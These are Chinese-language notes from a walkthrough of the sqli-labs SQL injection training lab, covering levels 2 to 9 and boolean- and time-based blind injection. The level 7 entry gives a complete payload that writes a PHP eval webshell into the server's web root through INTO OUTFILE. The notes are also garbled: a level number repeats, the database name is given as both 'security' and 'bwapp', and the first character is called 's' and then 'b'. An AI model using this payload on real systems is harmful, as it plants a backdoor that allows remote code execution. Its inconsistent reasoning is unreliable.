2关
找出数据库名字
从数据库security
中找到表明名:
找到数据库名字:
从表users中找到列:
取出表users用户名和密码:用户名~密码
3关
判断出id是(‘id’)的形式
4关
双引号测试报错,推测是(“id“)
5关
填写id=1没有回显信息(布尔盲注一般适用于页面没有回显字段(不支持联合查询),判断是布尔盲注,而且判断出是单引号注入
这时候用union 只会返回you are in…,没有有用信息,我们考虑用and,判断出数据库名字第一位是s
输入>100没有you are in 显示,判断数据库名字第一个ascii小于或等于100:
有了you are in,判断出数据库名字的第一个字符的ascii是98,即b,
其实这个数据库是bwapp
4关
和5关一样,只是变成了双引号布尔盲注:
7关
将一句话木马写入文件a.php中
http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'<?php @eval($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+
8关
判断如果数据库长度是8,则直接执行,否则执行sleep(5)
判断数据库名字的第一个ascii是否大于120,不大于则sleep(3)
9关
浏览器睡了3秒可以判断是单引号注入,这个不能用其他方法判断,因为没有任何返回的数据
